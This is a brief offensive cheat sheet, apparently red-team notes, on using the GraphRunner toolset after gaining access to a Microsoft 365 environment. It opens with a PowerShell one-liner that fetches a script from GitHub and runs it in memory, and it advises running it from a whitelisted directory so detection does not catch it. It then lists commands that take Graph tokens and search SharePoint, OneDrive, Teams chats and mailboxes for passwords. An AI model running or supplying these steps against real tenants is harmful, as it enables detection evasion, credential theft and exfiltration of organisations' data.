# GraphRunner

An excellent tool for finding loot in Microsoft 365 environments is the `GraphRunner` post-exploitation toolset. We can download and import the GraphRunner PowerShell script. It will be heavily signatured so we'll execute it from a whitelisted directory.

```powershell
IEX (iwr 'https://raw.githubusercontent.com/dafthack/GraphRunner/main/GraphRunner.ps1')
```

Get a graph session:

```
Get-GraphTokens
```

Download SharePoint and OneDrive files that contain "password"

```
Invoke-SearchSharePointAndOneDrive -Tokens $tokens -SearchTerm 'password'
```

Teams is commonly used by organizations and we can use the `Invoke-SearchTeams` module that can search all Teams messages in all channels that are readable by the current user, as well as notes/chat that the user sends to themselves.

```
Invoke-SearchTeams -Tokens $tokens -SearchTerm password
```

Search email:

```
Invoke-SearchMailbox -Tokens $tokens -SearchTerm "password" -MessageCount 40
```